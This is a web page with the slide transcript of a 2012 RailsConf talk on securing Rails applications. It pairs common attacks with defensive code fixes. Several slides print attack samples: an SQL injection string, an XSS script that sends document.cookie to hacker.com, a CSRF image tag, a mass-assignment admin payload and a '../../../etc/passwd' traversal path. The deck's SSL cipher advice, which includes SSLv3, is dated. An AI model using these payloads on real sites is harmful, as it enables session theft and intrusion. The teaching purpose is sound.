Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Securing your site

Sponsored · Ship Features Fearlessly Turn features on and off without deploys. Used by thousands of Ruby developers.
Avatar for bob_p bob_p
April 23, 2012
Technology
6
1k

Securing your site

My talk on securing your rails app, from Rails Conf 2012.

Avatar for bob_p

bob_p

April 23, 2012
Tweet

Other Decks in Technology

See All in Technology
Windows ファイル共有(SMB)を再確認する
Avatar for Murachi Akira murachiakira
PRO
0
280
夢の無限スパゲッティ製造機 #phperkaigi
Avatar for hideki kinjyo o0h
PRO
0
370
QA組織のAI戦略とAIテスト設計システムAITASの実践
Avatar for SansanTech sansantech
PRO
1
140
Laravelで学ぶOAuthとOpenID Connectの基礎と実装
Avatar for Koji Yoshida kyoshidaxx
4
1.9k
Embeddings : Symfony AI en pratique
Avatar for Grégoire Pineau lyrixx
0
290
事例から紐解くSHIFT流QA支援 ~大規模プロジェクトの品質管理支援、QA組織立ち上げ~ / 20260320 Nozomu Koketsu
Avatar for SHIFT EVOLVE shift_evolve
PRO
0
140
俺の/私の最強アーキテクチャ決定戦開催 ― チームで新しいアーキテクチャに適合していくために / 20260322 Naoki Takahashi
Avatar for SHIFT EVOLVE shift_evolve
PRO
1
440
SaaSに宿る21g
Avatar for Yamakan kanyamaguc
2
170
君はジョシュアツリーを知っているか?名前をつけて事象を正しく認識しよう / Do you know Joshua Tree?
Avatar for Y-KANOH ykanoh
4
130
Phase03_ドキュメント管理
Avatar for overflow ,Inc overflowinc
0
2.6k
ThetaOS - A Mythical Machine comes Alive
Avatar for Martijn aslander
0
180
JEDAI認定プログラム JEDAI Order 2026 受賞者一覧 / JEDAI Order 2026 Winners
Avatar for Databricks Japan databricksjapan
0
340

Featured

See All Featured
Game over? The fight for quality and originality in the time of robots
Avatar for Wayne Barker wayneb77
1
150
Believing is Seeing
Avatar for Spiro Bolos oripsolob
1
95
Helping Users Find Their Own Way: Creating Modern Search Experiences
Avatar for Dan Newman danielanewman
31
3.1k
Bioeconomy Workshop: Dr. Julius Ecuru, Opportunities for a Bioeconomy in West Africa
Avatar for AKADEMIYA2063 akademiya2063
PRO
1
75
Max Prin - Stacking Signals: How International SEO Comes Together (And Falls Apart)
Avatar for Tech SEO Connect techseoconnect
PRO
0
130
Taking LLMs out of the black box: A practical guide to human-in-the-loop distillation
Avatar for Ines Montani inesmontani
PRO
3
2.1k
Bootstrapping a Software Product
Avatar for Garrett Dimon garrettdimon
PRO
307
120k
Keith and Marios Guide to Fast Websites
Avatar for Keith Pitt keithpitt
413
23k
[RailsConf 2023] Rails as a piece of cake
Avatar for Vladimir Dementyev palkan
59
6.4k
Efficient Content Optimization with Google Search Console & Apps Script
Avatar for Katarina Dahlin katarinadahlin
PRO
1
430
Applied NLP in the Age of Generative AI
Avatar for Ines Montani inesmontani
PRO
4
2.2k
Building a Scalable Design System with Sketch
Avatar for Laura Van Doore lauravandoore
463
34k

Transcript

  1. Securing your site. @bob_p

  2. How Secure?

  3. SQL injection

  4. http://xkcd.com/327/

  5. None

  6. User.where("email ='#{params[:email]}'").first User.first(:conditions => "email = '#{params[:email]}’") SELECT "users".* FROM

    "users" WHERE (email = '' OR 1='1') LIMIT 1

  7. User.find_by_email(params[:email]) User.where("email = ?", params[:email]).first User.first(:conditions => ["email = ?",

    params[:email]])

  8. Summary Sanitise all SQL input

  9. XSS <script>alert(‘h4x0r3d’);</script>

  10. <script>alert(‘h4x0r3d’);</script> <script>document.write(‘<img src="http:// hacker.com/' + document.cookie + '">’);</script> <iframe src=”http://hacker.com/hack”></iframe>

  11. cookies(:secure_cookie, :httponly => true, :secure => true) Secure your cookies

  12. html_escape(“<script></script>”) Escape output < 3

  13. “hello”.html_safe? SafeBuffer > 3

  14. raw(“<h1>hello</h1>”) > 3 SafeBuffer

  15. Summary Secure your cookies Ensure user submitted input is sanitised

  16. Session management

  17. Rails.application.config.session_store :cookie_store Rails.application.config.session_store :cache_store Rails.application.config.session_store :active_record_store Session stores

  18. config.secret_token = '3783262ab68df94a79ab0 2edca8a1a9c3....' `rake secret`

  19. XSS

  20. Insecure networks Image from http://codebutler.com/

  21. Rails.application.config.force _ssl = true

  22. Allow logout

  23. Timeout

  24. MyApp::Application.config.session_store :cookie_store, :key => ‘_my_key’, :expire_after => 45.minutes class User

    < ActiveRecord::Base devise :authenticatable, :timeoutable, :timeout_in => 45.minutes end

  25. reset_session

  26. No concurrent logins

  27. Account lockout

  28. Password complexity

  29. Destroy session on logout def logout reset_session end

  30. Hash passwords class User def password=(password) self.encrypted_password = ::BCrypt::Engine.hash_secret(password, self.salt)

    end end

  31. http://codahale.com/how-to-safely-store-a-password/ Use bcrypt

  32. large objects No

  33. critical data No

  34. Summary SSL Hash data Clear sessions

  35. Mass Assignment “public_key” => {“user_id” => 4223}

  36. https://github.com/blog/1068-public-key-security-vulnerability-and-mitigation

  37. def signup @user = User.create(params[:user]) end params[:user] = {:username =>

    “pwn3d”, :admin => true}

  38. class User attr_protected :admin end

  39. class User attr_accessible :email end config.active_record.whitelist_attributes = true

  40. class User attr_accessible :role, :as => :admin end

  41. User.create({:username => ‘Bob’, :role => “admin”}, :as => :admin)

  42. def signup @user = User.create(user_params) end def user_params params[:user].slice(:email) end

  43. https://github.com/rails/ strong_parameters

  44. Summary attr_accessible Slice pattern attr_protected

  45. Direct object reference /users/:id/posts/:post_id

  46. def create @user = User.find(params[:user_id]) @note = Note.create(:user => @user,

    :text => params[:text]) end

  47. def create @user = User.find(session[:user_id]) @note = @user.notes.create(:text => params[:text])

    end

  48. def show @note = Note.find(params[:id]) end

  49. def show @user = User.find(session[:user_id]) @note = @user.notes.find(params[:id]) end

  50. def show @user = User.find(session[:user_id]) @note = Note.find(params[:id]) if @note.editable_by?(@user)

    # Do things end end

  51. Summary Find users from session Use scoping methods

  52. CSRF <img src=”http://demo.com/notes/1/destroy” />

  53. <img src=”http://example.com/notes/1/destroy” />

  54. POST PUT DELETE GET Safe requests / queries Changes resource

    / orders

  55. <input name="authenticity_token" type="hidden" value="HmY6ZvG0Qq3X7nv1yKm54cv05mpnw" />

  56. class ApplicationController protect_from_forgery end

  57. Summary Correct http verbs Rails CSRF protection

  58. Redirection & file uploads

  59. def login login_business redirect_to params[:from] end

  60. def login login_business redirect_to session[:from] end

  61. Sanitise file names

  62. “../../../etc/passwd”

  63. https://github.com/thoughtbot/paperclip/blob/master/lib/paperclip/ attachment.rb#L435 def cleanup_filename(filename) filename.gsub(/[&$+,\/:;=?@<>\[\]\ {\}\|\\\^~%# ]/, ‘_’) end

  64. Sanitise file type

  65. class User validates_attachment :avatar, :presence => true, :content_type => {

    :content_type => "image/jpg" }, :size => { :in => 0..10.kilobytes } end

  66. Process asynchronously

  67. Summary No redirect locations in params Sanitise file name/type Process

    files a-sync

  68. SSL

  69. Rails.application.config.force _ssl = true

  70. ssl_ciphers HIGH:!aNULL:!MD5; ssl_protocols SSLv3 TLSv1;

  71. Summary Use SSL!

  72. Admin & intranet

  73. CSRF

  74. XSS

  75. Whistlist.contains? (request.remote_ip)

  76. Summary XSS / CSRF / Injection Restrict access

  77. Info leakage

  78. server_tokens off;

  79. None

  80. Summary Don’t give away anything

  81. Server-side

  82. User privileges

  83. config.filter_parameters += [:password]

  84. Summary Restrict user permissions Obscure sensitive data

  85. Resources

  86. guides.rubyonrails.org/security.html

  87. www.rorsecurity.info

  88. brakemanscanner.org

  89. github.com/relevance/tarantula

  90. www.owasp.org

  91. @bob_p http://mintdigital.com ColorPalette: http://www.colourlovers.com/lover/electrikmonk/loveNote Thanks!